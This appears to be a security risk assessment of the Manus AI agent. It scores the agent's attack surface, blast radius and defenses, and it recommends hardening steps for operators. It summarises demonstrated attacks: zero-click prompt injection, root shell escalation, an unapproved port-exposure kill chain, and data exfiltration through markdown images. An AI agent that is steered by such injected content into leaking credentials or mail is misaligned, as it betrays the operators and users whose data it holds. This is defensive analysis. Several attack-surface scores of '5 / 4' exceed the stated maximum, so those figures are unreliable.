1 Key Risks
The most critical security risks an operator inherits when deploying this agent in its documented default configuration. Manus presents broad input and tool execution exposure with minimal vendor-implemented controls on the default configuration, placing the full hardening burden on the operator.
2 AIRQ Scores
The four headline scores quantify how exposed the agent is, how damaging a successful attack would be, and how much the agent’s own controls reduce that risk. Manus, now operating at enterprise scale under Meta [10], carries a low composite score reflecting high capability with high exposure and minimal default defenses.
Manus lands in the Exposed Giants quadrant with Attack Surface at 7.36, Blast Radius at 8.50, and Defense Controls at 2.
The table below summarizes Attack Surface out of 10, Blast Radius out of 10, Defense Controls out of 15, and the composite AIRQ score.
| Metric | Score | Comments |
|---|---|---|
| AIRQ Score | 4.88 | Low composite reflects high exposure with minimal default defenses; input filtering is the highest-return operator action. |
| Blast Radius | 8.5 / 10 | Root shell, unrestricted networking, and OAuth-scoped credential access across multiple connected services dominate the blast profile. |
| Attack Surface | 7.36 / 10 | Four surfaces at adjusted ceiling driven by zero-click prompt injection and tool execution exploits with all three trifecta conditions met. |
| Defense Controls | 2 / 15 | Sandbox isolation and infrastructure monitoring are the only vendor-implemented controls on the default configuration. |
3 Attack Surface
Attack surfaces are the entry points and interaction patterns through which adversarial input can reach the agent’s reasoning loop and steer its behavior. The agent reasoning loop ingests untrusted content from web browsing, search results, uploaded documents, and OAuth-connected services as first-class input.
Higher scores indicate surfaces where independent research has demonstrated exploitation or where the vendor documents broad unrestricted access by default.
Each row maps one attack surface to a score out of five and a brief comment citing the evidence anchor for the assessment.
| Surface | Score | Comments |
|---|---|---|
| User Input | 5 / 4 | Accepts input from web, desktop, mobile, messaging, email, API, and MCP channels with no documented input validation; zero-click injection demonstrated [1][2]. |
| External Data | 5 / 4 | Ingests untrusted content from web pages, search results, documents, and MCP connector feeds with no content validation gate [1][8]. |
| Memory | 1 / 4 | Per-task sandbox provides session-level context only with no cross-session persistence or memory poisoning surface [7]. |
| Reasoning | 3 / 4 | Multi-agent architecture with Planner, Execution, and Verification agents provides partial reasoning transparency [5][7]. |
| Planning | 3 / 4 | Autonomous task decomposition with subagent delegation, background scheduling, and email-triggered automation [7]. |
| Tool Execution | 5 / 4 | Root-level shell, browser, code execution, and deploy_expose_port with no per-action approval; passwordless sudo escalation demonstrated [1][2]. |
| Orchestration | 3 / 4 | Multi-service orchestration via MCP connectors for Gmail, Notion, Stripe, Slack, and custom user-defined servers [8]. |
| Inter-Agent | 3 / 4 | Connects to external MCP server ecosystems including custom user-defined servers with OAuth but no inter-agent message integrity; connector-level authorization alone does not prevent cross-boundary abuse [3][8]. |
| Output Processing | 5 / 4 | Rich output with markdown image rendering and browser navigation with no DLP or exfiltration blocking; markdown image exfiltration demonstrated [2][9]. |
| Configuration | 2 / 4 | MCP connectors from vendor-managed registry with OAuth authorization; custom MCP servers require explicit user setup; undisclosed telemetry modules found embedded in generated code [4][8]. |
The Lethal Trifecta is triggered when an agent processes untrusted content, accesses private data, and communicates externally in the same session — the three conditions that turn an isolated prompt injection into full-chain exfiltration. Manus ingests untrusted web content and connector data (untrusted_input), reads private mailbox and file-storage records via OAuth (sensitive_data), and transmits bytes outbound through unrestricted networking and markdown rendering (external_egress).
Manus exhibits all three of these conditions in its documented default configuration:
- Untrusted input — Browsed URLs, search engine results, fetched documents, and OAuth-connected service data all carry untrusted bytes into the agent reasoning loop [1][7].
- Sensitive data — OAuth-scoped MCP connectors read Gmail messages, Google Drive files, Notion pages, Stripe records, and GitHub repositories on behalf of the operator [8].
- External egress — Unrestricted outbound HTTP, deploy_expose_port, browser navigation, Gmail sending, Slack messaging, and markdown image fetching all transmit bytes outside the trust boundary [2][7].
4 Blast Radius
The blast radius is what an attacker who controls the agent can reach — which systems they touch, which credentials they read, and which actions they take without operator approval. A compromised Manus sandbox reaches root-level code execution, unrestricted outbound networking, OAuth-scoped credentials, and public internet exposure via deploy_expose_port.
Higher blast scores indicate factors where the agent holds broad default authority or where independent research demonstrated active exploitation.
Each row ties one blast factor to its score out of four and the agent-specific evidence anchoring the assessment.
| Factor | Score | Comments |
|---|---|---|
| Code execution | 4 / 4 | Root-level shell with passwordless sudo demonstrated within per-task cloud VM sandbox, enabling system-level command execution [1][7]. |
| File system access | 3 / 4 | Full read-write file system access within sandbox VM including system directories via root, in an ephemeral per-task environment [7]. |
| Network access | 4 / 4 | Unrestricted outbound networking from sandbox with no documented SSRF protection, plus deploy_expose_port for public internet exposure [2][7]. |
| Credential access | 3 / 4 | OAuth token access to Gmail, Google Drive, Stripe, HubSpot, GitHub, and other connected services via MCP connectors [8]. |
| Autonomous action | 3 / 4 | Autonomous operation with background tasks, scheduled tasks via Mail Manus, and no per-action approval within running tasks [7]. |
| Deployment access | 3 / 4 | deploy_expose_port directly exposes sandbox ports to the public internet, demonstrated in an independent prompt injection kill chain [2][7]. |
5 Defense Controls
Defense controls are what the agent’s own architecture does to detect, contain, and report attacks before they reach the operator’s systems. The vendor publishes sandbox isolation and compliance certifications but leaves input filtering, action approval, and output sanitization as operator-managed on the default configuration.
Higher scores indicate stronger vendor-implemented safeguards; most components score zero, reflecting an operator-managed defense posture.
Each component is scored on vendor-implemented defaults from zero (nothing in place) to three (independently verified multi-layer control).
| Component | Score | Comments |
|---|---|---|
| Input Guardrails | 0 / 3 | No documented prompt shield, content filter, or injection detection on the default configuration; zero-click injection demonstrated [1][6]. |
| Execution Isolation | 1 / 3 | Per-task cloud VM sandbox provides process isolation between tasks but grants root access and unrestricted networking within each sandbox [7]. |
| Action Controls | 0 / 3 | No per-action approval gates for tool execution within tasks; deploy_expose_port and shell commands fire autonomously [2]. |
| Output Guardrails | 0 / 3 | No documented DLP, credential redaction, or exfiltration channel blocking; markdown image exfiltration confirmed by independent research [2]. |
| Monitoring | 1 / 3 | Infrastructure monitoring implied by SOC 2 Type 2 and ISO 27001; operators should enable the E-Discovery API and SIEM integration available for enterprise to gain per-action visibility [6][11]. |
6 Hardening Tips
Concrete actions an operator can take to reduce the risks reported above, grouped by which defense control each tip strengthens. Operators should prioritize three actions in order: (1) input filtering to break the trifecta chain, (2) per-action approval gates for shell and deploy commands, (3) output sanitization to constrain blast radius.
Input Guardrails
Input guardrails intercept adversarial content before it reaches the reasoning loop.
- Policy Require all external content ingested via MCP connectors and web browsing to pass through an approved prompt injection classifier before reaching the agent.
- Configuration Restrict the Mail Manus approved senders list to the minimum set of known internal addresses and disable email-triggered automation for sensitive workflows.
- Engineering Deploy a purpose-built prompt shield service with instruction hierarchy separation between the untrusted data pipeline and the Manus reasoning loop.
Execution Isolation
Execution isolation contains what a compromised agent can do on the host.
- Policy Mandate that all Manus tasks involving sensitive data run in sandboxes with non-root user accounts and restricted sudo access.
- Configuration Configure sandbox firewall rules to block outbound connections to non-allowlisted domains, constraining the unrestricted default networking.
- Engineering Implement microVM isolation (e.g., Firecracker) with capability dropping and seccomp profiles for the sandbox agent process; verify by attempting a container escape from a task.
Action Controls
Action controls govern which tools and actions the agent can invoke autonomously.
- Policy Require operator approval for high-impact tool invocations including deploy_expose_port, MCP connector write operations, and outbound messaging.
- Configuration Configure MCP connector integrations to use read-only OAuth scopes by default, requiring explicit elevation for write or send operations.
- Engineering Build a policy enforcement proxy between the agent and tool execution endpoints evaluating each call against a deny-by-default allowlist.
Output Guardrails
Output guardrails inspect what the agent sends to other systems and users.
- Policy Block markdown image rendering from untrusted domains and disable automatic URL fetching in agent output to close demonstrated exfiltration channels.
- Configuration Configure output sanitization to strip embedded URLs, redirect chains, and active content from agent-generated markdown before delivery.
- Engineering Deploy a DLP gateway between the agent output pipeline and downstream consumers inspecting outbound content for credential patterns and PII.
Monitoring
Monitoring captures what the agent did and surfaces anomalies for review.
- Policy Forward all Manus task logs to the organization SIEM and establish alerting on anomalous tool invocation patterns for deploy_expose_port and MCP writes.
- Configuration Enable the Manus E-Discovery API for compliance workflows and configure retention policies covering all task inputs, outputs, and tool records.
- Engineering Instrument the sandbox environment with behavioral anomaly detection flagging unexpected shell sequences, network patterns, and privilege escalation attempts.
7 References
The evidence base behind every score and finding in the profile, grouped by source type so the reader can verify any claim. Numbers in brackets throughout the report (e.g. [7, 13]) refer to entries below, listed in citation order.
Selected Vulnerabilities
- SilentBridge zero-click agent takeover Aurascape AuraLabs — three zero-click indirect prompt injection variants against Meta Manus, each CVSS 9.8, root sandbox compromise and Gmail exfiltration
- Prompt injection exposes Manus VS Code Server Johann Rehberger — end-to-end indirect prompt injection kill chain invoking deploy_expose_port without approval and exfiltrating credentials via markdown images
Selected Research
- SilentBridge connector authorization analysis DeepInspect — control and data plane separation failure and cross-tenant IDOR on CDN and insufficiency of connector-level OAuth
- Manus AI hidden telemetry investigation Independent investigation — undisclosed analytics injection and network interception modules embedded in Manus-generated code
- Manus AI technical architecture analysis ArXiv — multi-agent architecture analysis covering Planner and Execution and Verification agent design and sandbox environment
Vendor Documentation
- Manus security and compliance page Vendor — SOC 2 Type 1 and 2 and ISO 27001:2022 and ISO 27701:2019 certifications and infrastructure and product security features
- Manus Sandbox architecture Vendor — per-task isolated cloud VM sandbox with Zero Trust principle and root access by design and unrestricted operations
- Manus MCP Connectors Vendor — prebuilt MCP integrations for Gmail and Notion and Stripe and HubSpot and Slack and Google Calendar and GitHub with OAuth 2.0
- Manus Cloud Browser Vendor — isolated cloud browser instances with encrypted sessions and Take Over mechanism for authentication challenges
Other Sources
- Meta acquires Manus AI agent firm CNBC — Meta acquisition of Manus and integration plans and platform scale of 147 trillion tokens processed
- Manus Compliance APIs Vendor — E-Discovery API and SIEM integration capabilities for regulated enterprise compliance workflows